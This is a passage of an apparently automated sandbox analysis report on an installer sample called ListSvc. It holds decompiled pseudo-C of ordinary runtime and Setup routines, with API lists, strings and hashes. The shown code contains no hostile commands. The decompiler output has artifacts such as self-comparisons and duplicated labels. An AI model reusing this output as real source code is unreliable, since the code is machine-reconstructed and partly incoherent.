				char _v632;
				void* _t64;
				intOrPtr _t65;
				long _t76;
				intOrPtr _t82;
				intOrPtr _t103;
				intOrPtr _t107;
				intOrPtr _t110;
				intOrPtr _t112;
				intOrPtr _t115;
				intOrPtr _t127;
				void* _t136;
				intOrPtr _t138;
				void* _t141;
				void* _t143;

				_t136 = __edi;
				_t140 = _t141;
				_v632 = 0;
				_v596 = 0;
				_v604 = 0;
				_v600 = 0;
				_v8 = 0;
				_push(_t141);
				_push(0x41f9a6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t141 + 0xfffffd8c;
				_t64 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x14)) - 1;
				_t143 = _t64;
				if(_t143 < 0) {
					_t65 =  *0x4ba798; // 0x40e730
					E0040C9F0(_t65,  &_v8, _t140);
				} else {
					if(_t143 == 0) {
						_t107 =  *0x4ba670; // 0x40e738
						E0040C9F0(_t107,  &_v8, _t140);
					} else {
						if(_t64 == 7) {
							_t110 =  *0x4ba4d0; // 0x40e740
							E0040C9F0(_t110,  &_v8, _t140);
						} else {
							_t112 =  *0x4ba5c8; // 0x40e748
							E0040C9F0(_t112,  &_v8, _t140);
						}
					}
				}
				_t115 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x18));
				VirtualQuery( *( *((intOrPtr*)(_a4 - 4)) + 0xc),  &_v36, 0x1c);
				_t138 = _v36.State;
				if(_t138 == 0x1000 || _t138 == 0x10000) {
					_t76 = GetModuleFileNameW(_v36.AllocationBase,  &_v558, 0x105);
					_t147 = _t76;
					if(_t76 == 0) {
						goto L12;
					} else {
						_v592 =  *( *((intOrPtr*)(_a4 - 4)) + 0xc);
						_v588 = 5;
						E0040858C( &_v600, 0x105,  &_v558);
						E0041A418(_v600, _t115,  &_v596, _t136, _t138, _t147);
						_v584 = _v596;
						_v580 = 0x11;
						_v576 = _v8;
						_v572 = 0x11;
						_v568 = _t115;
						_v564 = 5;
						_push( &_v592);
						_t103 =  *0x4ba6e0; // 0x40e810
						E0040C9F0(_t103,  &_v604, _t140, 3);
						E0041F2A0(_t115, _v604, 1, _t136, _t138);
					}
				} else {
					L12:
					_v628 =  *( *((intOrPtr*)(_a4 - 4)) + 0xc);
					_v624 = 5;
					_v620 = _v8;
					_v616 = 0x11;
					_v612 = _t115;
					_v608 = 5;
					_push( &_v628);
					_t82 =  *0x4ba67c; // 0x40e6d8
					E0040C9F0(_t82,  &_v632, _t140, 2);
					E0041F2A0(_t115, _v632, 1, _t136, _t138);
				}
				_pop(_t127);
				 *[fs:eax] = _t127;
				_push(0x41f9ad);
				E00407A20( &_v632);
				E00407A80( &_v604, 3);
				return E00407A20( &_v8);
			}

APIs

VirtualQuery.KERNEL32(?,?,0000001C,00000000,0041F9A6), ref: 0041F840
GetModuleFileNameW.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0041F9A6), ref: 0041F86C

Part of subcall function 0040C9F0: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 0040CA35

Strings

8@, xrefs: 0041F7FF
@@, xrefs: 0041F80E
0@, xrefs: 0041F7F0
H@, xrefs: 0041F81D

Memory Dump Source

Source File: 00000002.00000002.370471802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.370460929.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370680209.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370687660.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370693498.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370699761.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ListSvc.jbxd

Similarity

API ID: FileLoadModuleNameQueryStringVirtual
String ID: 0@$8@$@@$H@
API String ID: 902310565-4161625419
Opcode ID: 2bcb5d97eafe9ae16bdb5e5d20f221eb3d58e794d65a866e62d276be447e8c2a
Instruction ID: bbc3c026f35d1d6bea3ad9012fddeafd4c483e803022796d8e8ef386e34d3195
Opcode Fuzzy Hash: 2bcb5d97eafe9ae16bdb5e5d20f221eb3d58e794d65a866e62d276be447e8c2a
Instruction Fuzzy Hash: 69511874A04258DFCB10EF69CC89BCDB7F4AB48304F0042E6A808A7351D778AE85CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00406688, Relevance: 10.6, APIs: 7, Instructions: 130
threadCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00406688(signed char* __eax, void* __edx, void* __eflags) {
				void* _t49;
				signed char _t56;
				intOrPtr _t57;
				signed char _t59;
				void* _t70;
				signed char* _t71;
				intOrPtr _t72;
				signed char* _t73;

				_t70 = __edx;
				_t71 = __eax;
				_t72 =  *((intOrPtr*)(__eax + 0x10));
				while(1) {
					L1:
					 *_t73 = E00406B30(_t71);
					if( *_t73 != 0 || _t70 == 0) {
						break;
					}
					_t73[1] = 0;
					if(_t72 <= 0) {
						while(1) {
							L17:
							_t56 =  *_t71;
							if(_t56 == 0) {
								goto L1;
							}
							asm("lock cmpxchg [esi], edx");
							if(_t56 != _t56) {
								continue;
							} else {
								goto L19;
							}
							do {
								L19:
								_t73[4] = GetTickCount();
								E0040688C(_t71);
								_t57 =  *0x4bb8f8; // 0x4b9284
								 *((intOrPtr*)(_t57 + 0x10))();
								 *_t73 = 0 == 0;
								if(_t70 != 0xffffffff) {
									_t73[8] = GetTickCount();
									if(_t70 <= _t73[8] - _t73[4]) {
										_t70 = 0;
									} else {
										_t70 = _t70 - _t73[8] - _t73[4];
									}
								}
								if( *_t73 == 0) {
									do {
										asm("lock cmpxchg [esi], edx");
									} while ( *_t71 !=  *_t71);
									_t73[1] = 1;
								} else {
									while(1) {
										_t59 =  *_t71;
										if((_t59 & 0x00000001) != 0) {
											goto L29;
										}
										asm("lock cmpxchg [esi], edx");
										if(_t59 != _t59) {
											continue;
										}
										_t73[1] = 1;
										goto L29;
									}
								}
								L29:
							} while (_t73[1] == 0);
							if( *_t73 != 0) {
								_t71[8] = GetCurrentThreadId();
								_t71[4] = 1;
							}
							goto L32;
						}
						continue;
					}
					_t73[4] = GetTickCount();
					_t73[0xc] = 0;
					if(_t72 <= 0) {
						L13:
						if(_t70 == 0xffffffff) {
							goto L17;
						}
						_t73[8] = GetTickCount();
						_t49 = _t73[8] - _t73[4];
						if(_t70 > _t49) {
							_t70 = _t70 - _t49;
							goto L17;
						}
						 *_t73 = 0;
						break;
					}
					L5:
					L5:
					if(_t70 == 0xffffffff || _t70 > GetTickCount() - _t73[4]) {
						goto L8;
					} else {
						 *_t73 = 0;
					}
					break;
					L8:
					if( *_t71 > 1) {
						goto L13;
					}
					if( *_t71 != 0) {
						L12:
						E00406368( &(_t73[0xc]));
						_t72 = _t72 - 1;
						if(_t72 > 0) {
							goto L5;
						}
						goto L13;
					}
					asm("lock cmpxchg [esi], edx");
					if(0 != 0) {
						goto L12;
					}
					_t71[8] = GetCurrentThreadId();
					_t71[4] = 1;
					 *_t73 = 1;
					break;
				}
				L32:
				return  *_t73 & 0x000000ff;
			}

APIs

Part of subcall function 00406B30: GetCurrentThreadId.KERNEL32 ref: 00406B33

GetTickCount.KERNEL32 ref: 004066BF
GetTickCount.KERNEL32 ref: 004066D7
GetCurrentThreadId.KERNEL32 ref: 00406706
GetTickCount.KERNEL32 ref: 00406731
GetTickCount.KERNEL32 ref: 00406768
GetTickCount.KERNEL32 ref: 00406792
GetCurrentThreadId.KERNEL32 ref: 00406802

Memory Dump Source

Source File: 00000002.00000002.370471802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.370460929.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370680209.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370687660.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370693498.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370699761.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ListSvc.jbxd

Similarity

API ID: CountTick$CurrentThread
String ID:
API String ID: 3968769311-0
Opcode ID: d68569389b1874426944dbdaf855cb9de5dde29c2ee803ff208aff5c928e2b2c
Instruction ID: 4198438d609b3d92ee1caba3903e9c970ac06421e97b93dd9799f90313ce3de1
Opcode Fuzzy Hash: d68569389b1874426944dbdaf855cb9de5dde29c2ee803ff208aff5c928e2b2c
Instruction Fuzzy Hash: 664182712083419ED721AE3CC58431BBAD5AF80358F16C93ED4DA973C1EB7988958756

Uniqueness

Uniqueness Score: -1.00%

Function 004971AC, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 87
threadCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E004971AC(void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v5;
				char _v12;
				char _v16;
				char _v20;
				void* _t23;
				char _t29;
				void* _t50;
				intOrPtr _t55;
				char _t57;
				intOrPtr _t59;
				void* _t64;
				void* _t66;
				void* _t68;
				void* _t69;
				intOrPtr _t70;

				_t64 = __edi;
				_t57 = __edx;
				_t50 = __ecx;
				_t68 = _t69;
				_t70 = _t69 + 0xfffffff0;
				_v20 = 0;
				if(__edx != 0) {
					_t70 = _t70 + 0xfffffff0;
					_t23 = E004062B0(_t23, _t68);
				}
				_t49 = _t50;
				_v5 = _t57;
				_t66 = _t23;
				_push(_t68);
				_push(0x4972a5);
				_push( *[fs:eax]);
				 *[fs:eax] = _t70;
				E00405CB8(0);
				_t3 = _t66 + 0x2c; // 0x266461
				 *(_t66 + 0xf) =  *_t3 & 0x000000ff ^ 0x00000001;
				if(_t50 == 0 ||  *(_t66 + 0x2c) != 0) {
					_t29 = 0;
				} else {
					_t29 = 1;
				}
				 *((char*)(_t66 + 0xd)) = _t29;
				if( *(_t66 + 0x2c) != 0) {
					 *((intOrPtr*)(_t66 + 8)) = GetCurrentThread();
					 *((intOrPtr*)(_t66 + 4)) = GetCurrentThreadId();
				} else {
					if(_a4 == 0) {
						_t12 = _t66 + 4; // 0x495548
						 *((intOrPtr*)(_t66 + 8)) = E004078E0(0, E004970B8, 0, _t12, 4, _t66);
					} else {
						_t9 = _t66 + 4; // 0x495548
						 *((intOrPtr*)(_t66 + 8)) = E004078E0(0, E004970B8, _a4, _t9, 0x10004, _t66);
					}
					if( *((intOrPtr*)(_t66 + 8)) == 0) {
						E0041DFB0(GetLastError(), _t49, 0, _t66);
						_v16 = _v20;
						_v12 = 0x11;
						_t55 =  *0x4ba740; // 0x40ea6c
						E0041F35C(_t49, _t55, 1, _t64, _t66, 0,  &_v16);
						E0040711C();
					}
				}
				_pop(_t59);
				 *[fs:eax] = _t59;
				_push(0x4972ac);
				return E00407A20( &_v20);
			}

APIs

GetLastError.KERNEL32(00000000,004972A5,?,00495544,00000000), ref: 00497247

Part of subcall function 004078E0: CreateThread.KERNEL32 ref: 0040793A

GetCurrentThread.KERNEL32 ref: 0049727F
GetCurrentThreadId.KERNEL32 ref: 00497287

Strings

l@, xrefs: 00497266
XtI, xrefs: 00497214, 0049722F
0@G, xrefs: 0049726E

Memory Dump Source

Source File: 00000002.00000002.370471802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.370460929.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370680209.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370687660.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370693498.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370699761.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ListSvc.jbxd

Similarity

API ID: Thread$Current$CreateErrorLast
String ID: 0@G$XtI$l@
API String ID: 3539746228-385768319
Opcode ID: a4dc03de5b91be95089a9569e035fcfb45136a4f5e23dfed5c7514759ebadc63
Instruction ID: 1159262e71bebd7e921a745d602ab6fc0c684f98ff6f66721209a3575415716a
Opcode Fuzzy Hash: a4dc03de5b91be95089a9569e035fcfb45136a4f5e23dfed5c7514759ebadc63
Instruction Fuzzy Hash: 2B31E2309287449EDB10EBB68C427AB7FE49F09304F40C87EE455973C1DA3CA545C799

Uniqueness

Uniqueness Score: -1.00%

Function 00406424, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 63
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 36%

			E00406424(void* __edx) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				char* _t23;
				intOrPtr _t29;
				intOrPtr _t39;
				void* _t41;
				void* _t43;
				intOrPtr _t44;

				_t41 = _t43;
				_t44 = _t43 + 0xfffffff4;
				_v16 = 0;
				if(GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetLogicalProcessorInformation") == 0) {
					L10:
					_v8 = 0x40;
					goto L11;
				} else {
					_t23 =  &_v16;
					_push(_t23);
					_push(0);
					L00403808();
					if(_t23 != 0 || GetLastError() != 0x7a) {
						goto L10;
					} else {
						_v12 = E004053F0(_v16);
						_push(_t41);
						_push(E004064D2);
						_push( *[fs:edx]);
						 *[fs:edx] = _t44;
						_push( &_v16);
						_push(_v12);
						L00403808();
						_t29 = _v12;
						if(_v16 <= 0) {
							L8:
							_pop(_t39);
							 *[fs:eax] = _t39;
							_push(E004064D9);
							return E0040540C(_v12);
						} else {
							while( *((short*)(_t29 + 4)) != 2 ||  *((char*)(_t29 + 8)) != 1) {
								_t29 = _t29 + 0x18;
								_v16 = _v16 - 0x18;
								if(_v16 > 0) {
									continue;
								} else {
									goto L8;
								}
								goto L12;
							}
							_v8 =  *(_t29 + 0xa) & 0x0000ffff;
							E00407210();
							L11:
							return _v8;
						}
					}
				}
				L12:
			}

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation), ref: 00406439
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040643F
GetLastError.KERNEL32(00000000,?,GetLogicalProcessorInformation), ref: 0040645B

Strings

GetLogicalProcessorInformation, xrefs: 0040642F
@, xrefs: 004064D9
kernel32.dll, xrefs: 00406434

Memory Dump Source

Source File: 00000002.00000002.370471802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.370460929.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370680209.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370687660.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370693498.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370699761.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ListSvc.jbxd

Similarity

API ID: AddressErrorHandleLastModuleProc
String ID: @$GetLogicalProcessorInformation$kernel32.dll
API String ID: 4275029093-79381301
Opcode ID: 60cbd49ddd200d6d95d4e054eb85e0ada012a2fb0b751d352b1ba5f8ec496b5f
Instruction ID: 8f5f9a4eb212fab3c4852abc810e80ead921d34dcce11bc4c58bc7a6251dba94
Opcode Fuzzy Hash: 60cbd49ddd200d6d95d4e054eb85e0ada012a2fb0b751d352b1ba5f8ec496b5f
Instruction Fuzzy Hash: 52116371D00208BEDB20EFA5D84576EBBA8EB40705F1184BBF815F32C1D67D9A908B1D

Uniqueness

Uniqueness Score: -1.00%

Function 004076B8, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40
fileCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E004076B8(void* __ecx) {
				long _v4;
				void* _t3;
				void* _t9;

				if( *0x4bb058 == 0) {
					if( *0x4b7032 == 0) {
						_push(0);
						_push("Error");
						_push("Runtime error     at 00000000");
						_push(0);
						L00403780();
					}
					return _t3;
				} else {
					if( *0x4bb344 == 0xd7b2 &&  *0x4bb34c > 0) {
						 *0x4bb35c();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1d,  &_v4, 0);
					_t9 = E00408240(0x40774c);
					return WriteFile(GetStdHandle(0xfffffff5), _t9, 2,  &_v4, 0);
				}
			}

0x004076c0
0x00407726
0x00407728
0x0040772a
0x0040772f
0x00407734
0x00407736
0x00407736
0x0040773c
0x004076c2
0x004076cb
0x004076db
0x004076db
0x004076f7
0x0040770a
0x0040771e
0x0040771e

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?,0040555F), ref: 004076F1
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?), ref: 004076F7
GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?), ref: 00407712
WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?), ref: 00407718

Strings

Error, xrefs: 0040772A
Runtime error at 00000000, xrefs: 004076EA, 0040772F

Memory Dump Source

Source File: 00000002.00000002.370471802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.370460929.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370680209.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370687660.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370693498.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370699761.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ListSvc.jbxd

Similarity

API ID: FileHandleWrite
String ID: Error$Runtime error at 00000000
API String ID: 3320372497-2970929446
Opcode ID: 06894f85802f1aca0c877f66b17294aabd6ee15dfccdef8be12070d3d0c4ead6
Instruction ID: db14fa18f2a627875cbdcf208ba1e0af1765c14dc112cf76e17f9611cef7a876
Opcode Fuzzy Hash: 06894f85802f1aca0c877f66b17294aabd6ee15dfccdef8be12070d3d0c4ead6
Instruction Fuzzy Hash: DFF0C2A1A8C24079FA2077A94C47F5A269C8740B16F108A3FF610B61D1C7FD6584937E

Uniqueness

Uniqueness Score: -1.00%

Function 00420524, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00420524(void* __ebx, void* __esi) {
				intOrPtr _t4;
				intOrPtr _t6;

				if(E0041FF68(6, 0) == 0) {
					_t4 = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"NTDLL.DLL"), L"RtlCompareUnicodeString");
					 *0x4be914 = _t4;
					 *0x4be910 = E00420428;
					return _t4;
				} else {
					_t6 = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"CompareStringOrdinal");
					 *0x4be910 = _t6;
					return _t6;
				}
			}

0x00420532
0x0042055f
0x00420564
0x00420569
0x00420573
0x00420534
0x00420544
0x00420549
0x0042054e
0x0042054e

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,CompareStringOrdinal,004B5A2E,00000000,004B5A41), ref: 0042053E

Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00423116), ref: 0040E1D2

GetModuleHandleW.KERNEL32(NTDLL.DLL,RtlCompareUnicodeString,004B5A2E,00000000,004B5A41), ref: 00420559

Strings

RtlCompareUnicodeString, xrefs: 0042054F
CompareStringOrdinal, xrefs: 00420534
NTDLL.DLL, xrefs: 00420554
kernel32.dll, xrefs: 00420539

Memory Dump Source

Source File: 00000002.00000002.370471802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.370460929.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370680209.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370687660.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370693498.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370699761.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ListSvc.jbxd

Similarity

API ID: HandleModule$AddressProc
String ID: CompareStringOrdinal$NTDLL.DLL$RtlCompareUnicodeString$kernel32.dll
API String ID: 1883125708-3870080525
Opcode ID: b7bf267469631706014ef5b6a976724c1e29590bd579973413919bb6c8384525
Instruction ID: 4ba185d4141586243d2650af69d43cb091b5da9faf927984522c9bbe9ad7037f
Opcode Fuzzy Hash: b7bf267469631706014ef5b6a976724c1e29590bd579973413919bb6c8384525
Instruction Fuzzy Hash: 04E08CF0B4232036E644FB672C0769929C51B85709BD04A3F7004BA1D7DBBE42659E2E

Uniqueness

Uniqueness Score: -1.00%

Function 0042931C, Relevance: 9.1, APIs: 6, Instructions: 144
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E0042931C(short* __eax, intOrPtr __ecx, signed short* __edx) {
				char _v260;
				char _v768;
				char _v772;
				short* _v776;
				intOrPtr _v780;
				char _v784;
				signed int _v788;
				signed short* _v792;
				char _v796;
				char _v800;
				intOrPtr* _v804;
				signed short* _v808;
				void* __ebp;
				signed char _t55;
				signed int _t64;
				void* _t72;
				intOrPtr* _t83;
				void* _t103;
				void* _t105;
				void* _t108;
				void* _t109;
				intOrPtr* _t118;
				void* _t122;
				intOrPtr _t123;
				char* _t124;
				void* _t125;

				_t110 = __ecx;
				_v780 = __ecx;
				_v808 = __edx;
				_v776 = __eax;
				if((_v808[0] & 0x00000020) == 0) {
					E00428FDC(0x80070057);
				}
				_t55 =  *_v808 & 0x0000ffff;
				if((_t55 & 0x00000fff) != 0xc) {
					_push(_v808);
					_push(_v776);
					L00427254();
					return E00428FDC(_v776);
				} else {
					if((_t55 & 0x00000040) == 0) {
						_v792 = _v808[4];
					} else {
						_v792 =  *(_v808[4]);
					}
					_v788 =  *_v792 & 0x0000ffff;
					_t103 = _v788 - 1;
					if(_t103 < 0) {
						L9:
						_push( &_v772);
						_t64 = _v788;
						_push(_t64);
						_push(0xc);
						L00427828();
						_t123 = _t64;
						if(_t123 == 0) {
							E00428D34(_t110);
						}
						E00429278(_v776);
						 *_v776 = 0x200c;
						 *((intOrPtr*)(_v776 + 8)) = _t123;
						_t105 = _v788 - 1;
						if(_t105 < 0) {
							L14:
							_t107 = _v788 - 1;
							if(E00429294(_v788 - 1, _t125) != 0) {
								L00427840();
								E00428FDC(_v792);
								L00427840();
								E00428FDC( &_v260);
								_v780(_t123,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
							}
							_t72 = E004292C4(_t107, _t125);
						} else {
							_t108 = _t105 + 1;
							_t83 =  &_v768;
							_t118 =  &_v260;
							do {
								 *_t118 =  *_t83;
								_t118 = _t118 + 4;
								_t83 = _t83 + 8;
								_t108 = _t108 - 1;
							} while (_t108 != 0);
							do {
								goto L14;
							} while (_t72 != 0);
							return _t72;
						}
					} else {
						_t109 = _t103 + 1;
						_t122 = 0;
						_t124 =  &_v772;
						do {
							_v804 = _t124;
							_push(_v804 + 4);
							_t23 = _t122 + 1; // 0x1
							_push(_v792);
							L00427830();
							E00428FDC(_v792);
							_push( &_v784);
							_t26 = _t122 + 1; // 0x1
							_push(_v792);
							L00427838();
							E00428FDC(_v792);
							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
							_t122 = _t122 + 1;
							_t124 = _t124 + 8;
							_t109 = _t109 - 1;
						} while (_t109 != 0);
						goto L9;
					}
				}
			}

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 004293D1
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 004293ED
SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 00429426
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 004294A3
SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 004294BC
VariantCopy.OLEAUT32(?,?), ref: 004294F7

Memory Dump Source

Source File: 00000002.00000002.370471802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.370460929.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370680209.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370687660.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370693498.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370699761.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ListSvc.jbxd

Similarity

API ID: ArraySafe$BoundIndex$CopyCreateVariant
String ID:
API String ID: 351091851-0
Opcode ID: 098dc979d013d57468a629589b458cb88fc05e19e5f0a5a7df6b54d31b1502c0
Instruction ID: 2fed5c09d90993a71d142947efe00684c7910c2ed580f9cb9a97fb5731140b2d
Opcode Fuzzy Hash: 098dc979d013d57468a629589b458cb88fc05e19e5f0a5a7df6b54d31b1502c0
Instruction Fuzzy Hash: 4B51EE75A012299FCB21DB59D981BDAB3FCAF0C304F8041DAF548E7211D634AF858F65

Uniqueness

Uniqueness Score: -1.00%

Function 004AFA44, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 44
windowCOMMON

Download Yara Rule

C-Code - Quality: 34%

			E004AFA44(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				void* _t24;
				intOrPtr _t28;
				void* _t31;
				void* _t32;
				intOrPtr _t35;

				_t32 = __esi;
				_t31 = __edi;
				_push(0);
				_push(0);
				_t24 = __eax;
				_push(_t35);
				_push(0x4aface);
				_push( *[fs:eax]);
				 *[fs:eax] = _t35;
				if(( *0x4c1d61 & 0x00000001) == 0) {
					E00407A20( &_v8);
				} else {
					E00407E48( &_v8, L"/ALLUSERS\r\nInstructs Setup to install in administrative install mode.\r\n/CURRENTUSER\r\nInstructs Setup to install in non administrative install mode.\r\n");
				}
				_push(L"The Setup program accepts optional command line parameters.\r\n\r\n/HELP, /?\r\nShows this information.\r\n/SP-\r\nDisables the This will install... Do you wish to continue? prompt at the beginning of Setup.\r\n/SILENT, /VERYSILENT\r\nInstructs Setup to be silent or very silent.\r\n/SUPPRESSMSGBOXES\r\nInstructs Setup to suppress message boxes.\r\n/LOG\r\nCauses Setup to create a log file in the user\'s TEMP directory.\r\n/LOG=\"filename\"\r\nSame as /LOG, except it allows you to specify a fixed path/filename to use for the log file.\r\n/NOCANCEL\r\nPrevents the user from cancelling during the installation process.\r\n/NORESTART\r\nPrevents Setup from restarting the system following a successful installation, or after a Preparing to Install failure that requests a restart.\r\n/RESTARTEXITCODE=exit code\r\nSpecifies a custom exit code that Setup is to return when the system needs to be restarted.\r\n/CLOSEAPPLICATIONS\r\nInstructs Setup to close applications using files that need to be updated.\r\n/NOCLOSEAPPLICATIONS\r\nPrevents Setup from closing applications using files that need to be updated.\r\n/FORCECLOSEAPPLICATIONS\r\nInstructs Setup to force close when closing applications.\r\n/FORCENOCLOSEAPPLICATIONS\r\nPrevents Setup from force closing when closing applications.\r\n/LOGCLOSEAPPLICATIONS\r\nInstructs Setup to create extra logging when closing applications for debugging purposes.\r\n/RESTARTAPPLICATIONS\r\nInstructs Setup to restart applications.\r\n/NORESTARTAPPLICATIONS\r\nPrevents Setup from restarting applications.\r\n/LOADINF=\"filename\"\r\nInstructs Setup to load the settings from the specified file after having checked the command line.\r\n/SAVEINF=\"filename\"\r\nInstructs Setup to save installation settings to the specified file.\r\n/LANG=language\r\nSpecifies the internal name of the language to use.\r\n/DIR=\"x:\\dirname\"\r\nOverrides the default directory name.\r\n/GROUP=\"folder name\"\r\nOverrides the default folder name.\r\n/NOICONS\r\nInstructs Setup to initially check the Don\'t create a Start Menu folder check box.\r\n/TYPE=type name\r\nOverrides the default setup type.\r\n/COMPONENTS=\"comma separated list of component names\"\r\nOverrides the default component settings.\r\n/TASKS=\"comma separated list of task names\"\r\nSpecifies a list of tasks that should be initially selected.\r\n/MERGETASKS=\"comma separated list of task names\"\r\nLike the /TASKS parameter, except the specified tasks will be merged with the set of tasks that would have otherwise been selected by default.\r\n/PASSWORD=password\r\nSpecifies the password to use.\r\n");
				_push(_v8);
				_push(_t24);
				_push(0x4b0f94);
				_push(L"For more detailed information, please visit https://jrsoftware.org/ishelp/index.php?topic=setupcmdline");
				E004087C4( &_v12, _t24, 5, _t31, _t32);
				MessageBoxW(0, E004084EC(_v12), L"Setup", 0x10);
				_pop(_t28);
				 *[fs:eax] = _t28;
				_push(E004AFAD5);
				return E00407A80( &_v12, 2);
			}

APIs

MessageBoxW.USER32(00000000,00000000,Setup,00000010), ref: 004AFAAE

Strings

/ALLUSERSInstructs Setup to install in administrative install mode./CURRENTUSERInstructs Setup to install in non administrat, xrefs: 004AFA68
Setup, xrefs: 004AFA9E
The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will in, xrefs: 004AFA7C
For more detailed information, please visit https://jrsoftware.org/ishelp/index.php?topic=setupcmdline, xrefs: 004AFA8A

Memory Dump Source

Source File: 00000002.00000002.370471802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.370460929.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370680209.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370687660.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370693498.00000000004C4000.00000002.00020000.sdmp Download File
